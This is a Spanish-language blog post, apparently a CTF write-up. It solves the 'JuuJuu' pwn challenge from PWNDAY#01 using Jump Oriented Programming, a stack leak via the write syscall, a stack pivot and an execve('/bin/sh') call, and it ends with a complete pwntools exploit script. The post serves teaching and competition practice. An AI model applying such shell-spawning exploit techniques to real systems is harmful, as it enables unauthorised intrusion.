<html lang="en-US">
    <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=77d0b5d7d2c1cec9c35be71d90687d8e6199d355">
    <script src="https://kit.fontawesome.com/cad5e6b3e1.js" crossorigin="anonymous"></script>

<!-- Begin Jekyll SEO tag v2.7.1 -->
<title>WRITEUP, JuuJuu, PWNDAY#01 soluciones | dplastico</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="WRITEUP, JuuJuu, PWNDAY#01 soluciones" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Hace un tiempo el gran c4e me mostró un challenge que había preparado, el cual me gusto tanto que nos motivamos a hacer PWNDAY#01, donde hicimos algunos challenge pwn con diferentes dificultades, (básico-intermedio-pro), el nivel pro fue un reto de c4e que antes de lanzarlo obviamente me invito a que solucionara para ver la dificultad, el reto me costo MUCHO, me tomo mas de 18 horas solucionarlo parcializado en varios días (pero por que soy un un n00b :D, y bueno también porque nunca había utilizado JOP)" />
<meta property="og:description" content="Hace un tiempo el gran c4e me mostró un challenge que había preparado, el cual me gusto tanto que nos motivamos a hacer PWNDAY#01, donde hicimos algunos challenge pwn con diferentes dificultades, (básico-intermedio-pro), el nivel pro fue un reto de c4e que antes de lanzarlo obviamente me invito a que solucionara para ver la dificultad, el reto me costo MUCHO, me tomo mas de 18 horas solucionarlo parcializado en varios días (pero por que soy un un n00b :D, y bueno también porque nunca había utilizado JOP)" />
<link rel="canonical" href="http://localhost:4000/sin%20categor%C3%ADa/2020/05/23/writeup-juujuu-pwnday01-soluciones.html" />
<meta property="og:url" content="http://localhost:4000/sin%20categor%C3%ADa/2020/05/23/writeup-juujuu-pwnday01-soluciones.html" />
<meta property="og:site_name" content="dplastico" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-05-23T22:11:00-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="WRITEUP, JuuJuu, PWNDAY#01 soluciones" />
<script type="application/ld+json">
{"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/sin%20categor%C3%ADa/2020/05/23/writeup-juujuu-pwnday01-soluciones.html"},"url":"http://localhost:4000/sin%20categor%C3%ADa/2020/05/23/writeup-juujuu-pwnday01-soluciones.html","headline":"WRITEUP, JuuJuu, PWNDAY#01 soluciones","dateModified":"2020-05-23T22:11:00-04:00","datePublished":"2020-05-23T22:11:00-04:00","description":"Hace un tiempo el gran c4e me mostró un challenge que había preparado, el cual me gusto tanto que nos motivamos a hacer PWNDAY#01, donde hicimos algunos challenge pwn con diferentes dificultades, (básico-intermedio-pro), el nivel pro fue un reto de c4e que antes de lanzarlo obviamente me invito a que solucionara para ver la dificultad, el reto me costo MUCHO, me tomo mas de 18 horas solucionarlo parcializado en varios días (pero por que soy un un n00b :D, y bueno también porque nunca había utilizado JOP)","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

</head>



    <body>

        <header>
    <div class="container buffer">
        <a id="title" href="/">
            <h1>dplastico</h1>
        </a>
    </div>
    <div class="navbar">
    <div class="container">
        <input type="checkbox" id="show-menu">
        <label for="show-menu" class="menu">
            <p>Menu</p>
            <i class="far fa-caret-square-down"></i>
        </label>
        <ul>
        
            <li class="item"><a href="/">Home</a></li>
            <li class="item"><a href="/blog">Blog</a></li>
            <li class="item"><a href="/about">About</a></li>
        
        </ul>
    </div>
</div>

</header>



        <div class="content">
            <div class="container">
                <section id="main_content">
                    <!-- wp:paragraph -->
<p>Hace un tiempo el gran <a href="https://c4ebt.github.io/"><strong>c4e</strong></a><strong> </strong>me mostró un challenge que había preparado, el cual me gusto tanto que nos motivamos a hacer PWNDAY#01, donde hicimos algunos challenge pwn con diferentes dificultades, (básico-intermedio-pro), el nivel pro fue un reto de <a href="https://c4ebt.github.io/"><strong>c4e</strong></a><strong> </strong>que antes de lanzarlo obviamente me invito a que solucionara para ver la dificultad, el reto me costo MUCHO, me tomo mas de 18 horas solucionarlo parcializado en varios días (pero por que soy un un n00b :D,  y bueno también porque nunca había utilizado JOP)<br /></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>JOP o Jump Oriented Programming, es una técnica basada en ROP de la cual ya he hablado en este blog, pero en vez de usar un ret al final, usamos instrucciones de salto o JMP para volver a parte controlada del código con gadgets llamados dispatchers, para aprender más sobre JOP, acá hay un <a href="https://www.comp.nus.edu.sg/~liangzk/papers/asiaccs11.pdf"><strong>paper </strong></a>que explica bastante bien todo.<br /></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Primero comenzamos debugeando el binario, el cual podemos ver es un ejecutable x64<br /></p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh6.googleusercontent.com/d6Q0oGMfS-PO77AAuhXj_bDjisXHOyuL2WvirnjpnI6bCNhbdGx3ID_igKxv0ZRXNPv9BoymjTU0tjCM2PNkD61x6Bfb1shCVn5AaU2oKjhKTOX4CdDCUwuYyzXeyBQFDHuh_3Wr" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Observamos las protecciones del binario usando <a href="https://github.com/slimm609/checksec.sh">checksec</a><br /></p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh3.googleusercontent.com/kUjY_aEuVv_rX8Qk50Fv_tn_cAysA1PV5lxD0oVXMfeDEb-ubnIdsjBMQ59XdZasVfVXBmO5ukWhBeNBlv3WGalFkCU_mWJfS8B0xdwR1ZNCoEdN7vTaJ1M6BFF3PtVjY01uFnsZ" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Las direcciones del binario se mantendrán debido al “flag” de “no-pie” esto nos será de ayuda ya que no debemos bypassear aslr usando gadgets dentro del binario, al observar el programa vemos que es bastante pequeno, escrtito en assembler, y con solo una funcion que lee</p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh4.googleusercontent.com/0kaKbB3JMAlNESHFraL0R2JMDyIcFUsfu9ERXa_v4MjKlQ45he6vXNH5ZkUuhWWiQDUHVTRaeXJwqRViwWYXjLmuvPE5Y1AtZT0tXeikVgDiTjIl-hqcP7Ifi_mN65MkQQrPqalc" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Ademas ya podemos observar que no hay aparentes instrucciones ret lo cual podemos comprobar ejecutando ropper y/o objdump</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Además todos los saltos son a registros “dereference” ([reg]), por lo cual no podemos hacer, por ejemplo, un pop RCX y luego saltar a RCX, ya que el salto será a [RCX], por lo cual debemos ver la forma de filtrar alguna direccion del stack para poder calcular los offsets a cada registro.<br /></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para nuestra suerte tenemos un primer gadget que podemos usar como dispatcher y es la dirección 4000c7, la cual suma 8 a RSP y luego salta al dereference de RSP-0x8 por tanto nos permitirá saltar a la dirección que pongamos antes en nuestro payload, por lo que la enviaremos de la siguiente forma:<br /></p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh3.googleusercontent.com/F9dYG3ZVDfsbgMbngSVOlZ3jcO7bJWki760g4WTijbBFs8SEzf-64e5pcQEjV1Zv-OepNs1gDlp_h7pV6gPHIATpkzsmuJenBnSc0EJsMhulp1KCBzr4FR755cBDazLU29r3rJns" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Usamos la direccion 4000d4 como salto ya que dicha dirección contiene un push de RSP que empujara la dirección de RSP al stack y nos permitirá controlar el salto a RCX ya que RCX contendrá la dirección del stack donde se encuentra ADD RSP + 8 ; JMP [rsp-0x8]<br /></p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh3.googleusercontent.com/Y8O0LSbcwXYc4szVnE4RolzZlBhukS0e2OS2h1UUfdseLoHFRLVUXHDchdBo00pIYGxdALhS2MKi4wdA1jhVKZHpebRgDlAscHHOJirhg23PWfg8DycDSL-vp_6j22-KWeA73Odo" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Con esto ya podemos setear nuestro dispatcher en [RCX]&nbsp; y aprovechando el vuelo usando los gadgets lo seteamos a RBP y r10 (ya que el código lo permite). Ahora cualquier instrucción que pongamos se ejecutará, siempre cuando tenga un salto a [RCX]. [RBP] o [r10]<br /></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ahora nos topamos con otro obstáculo! El stack es muy pequeño, qué podemos hacer? Pivotear!, pues para eso usaremos la instrucción en 400131 la cual le resta 0x100 al stack con esto haremos un salto atrasa 32 bytes de nuestro salto inicial<br /></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Seteamos el dispatcher nuevamente a RCX y ahora ejecutamos el syscall de write, para que write? Pues dado que no tenemos idea de donde encontrar nuestro stack para poder hacer una llamada a los registros sin tener que forzosamente dar cero a RAX (otro problema), pues debemos lekear una dirección del stack, para esto usaremos write y escribiremos el leak al stdout para leerlo. Con esto el programa se ejecutara de nuevo, pero esta vez tendremos la dirección del stack a nuestro alcance para hacer los cálculos de gadgets correspondientes</p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh6.googleusercontent.com/cBSsS9AVRUBSYndiDIdGjS0v5McYASHa56xbTweIjzyG3FUd7X3QKaA8yI94IvlYStMiDjGQoYKNotT2kPj_C1X1mXTFbD1jt4rkG11WB4os3r7h2ZclZtUWW9QCTBPOynhLtfBM" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Perfecto ya con este leak podemos comenzar a preparar nuevamente el exploit repitiendo los primeros pasos pero esta vez en vez de llamar a write, jugaremos con los valores de los registros para poder llamar a execve() con el offset desde nuestro leak al string de /bin/sh que enviaremos al comienzo del payload<br /></p>
<!-- /wp:paragraph -->

<!-- wp:image -->
<figure class="wp-block-image"><img src="https://lh4.googleusercontent.com/Vz3Yx0E-cTm9H9vsDHSqP821bBOOLmM_IHnLHAEbFj5u4dn9vegw4aJmMYE7hMU0HxiSkJnFvAuf-Xuo8cT9hPlEQhtf0LbpdQQ_e5oSlVykw2t2g_7LfJ0HKQMS4TiXd84u7e8d" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Perfecto y ejecutamos y SHELL<br /></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Disfrute mucho este reto, siento que cuando uno se ve atrapado es cuando uno más aprende, de verdad felicitaciones nuevamente al creador del reto. EL resto de solucioens pueden verlas en mi github</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a href="https://github.com/dplastico/pwnday01">https://github.com/dplastico/pwnday01</a></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Aca les dejo el exploit final:</p>
<!-- /wp:paragraph -->

<!-- wp:code -->
<pre class="wp-block-code"><code>from pwn import *

#0x4000c5 syscall
#offset 2 24
r = process('./juujuu')
#gdb.attach(r)
#r = remote('159.89.45.52', 5555)
empezando = "/bin/sh\0" #controlamos este registro, rsi

#stage 1
#------------------------------------------------------------#
#construyendo salto atras
jop = "A" * 24
#saltando a rsp +8 , [rsp-8]
jop += p64(0x4000d4)
jop += p64(0x4000c7)
#write syscall para hacer un leak del stack
jop += p64(0x4000fc)
jop += p64(0x004000b0)

junk = "A" * (cyclic_find('qaac')-len(empezando)-8-len(jop))                        
payload = empezando                                                               
payload += jop                                                                      
payload += junk

#seteando [rcx] a dispatcher                                                    
payload += p64(0x4000d4)                                                   
payload += p64(0x4000c7)

#[rbp] a dispatcher
payload += p64(0x00000000004000cf)

#setear r10 a dispatcher, por que si no mas
payload += p64(0x4000ec)

#mas stack (pivot)                                                      
payload += p64(0x0000000000400131)#sub rsp 100                                  
r.sendline(payload)

#--------------------------------------------------------#

#stage2
#recibiendo leak del stack
resp = u64(r.recv(8))
print "LEAK  STACK  :   ",hex(resp)

#seteando salto atras para syscall final execve()
jop2 = "A" * 32
#
jop2 += p64(0x4000de) #inc RAX
jop2 += p64(resp)#restaurando rcx
jop2 += p64(0x4000de) #inc RAX
jop2 += p64(resp)#restaurando rcx
jop2 += p64(0x4000de) #inc RAX
jop2 += p64(resp)#restaurando rcx
jop2 += p64(0x400108)#add rax 12
jop2 += p64(0x400108)#add rax 12
jop2 += p64(0x400108)#add rax 12
jop2 += p64(0x400125)
jop2 += p64(resp-0x1c8) #address the bin sh enviada esta 0x1c8 del leak de stack
jop2 += p64(0x40011b)# xor los otros reg
jop2 += p64(resp)
jop2 += p64(0x400101) #syscall

junk = "A" * (cyclic_find('qaac')-len(empezando)-8-len(jop2))                                             
payload2 = empezando  #/bin/sh                                                               
payload2 += jop2                                                                     
payload2 += junk
#seteando [rcx] a dispatcher                                                   
payload2 += p64(0x4000d5) #rax a 0x0 y luego a 0x1                                                  
payload2 += p64(resp)#restaurando rcx
payload2 += p64(0x4000de) #inc RAX
payload2 += p64(resp)#restaurando rcx
#ganando stack
payload2 += p64(0x0000000000400131)#sub rsp 100                                            
r.sendline(payload2)

r.interactive()
</code></pre>
<!-- /wp:code -->

                </section>
            </div>
        </div>

        
    </body>
</html>
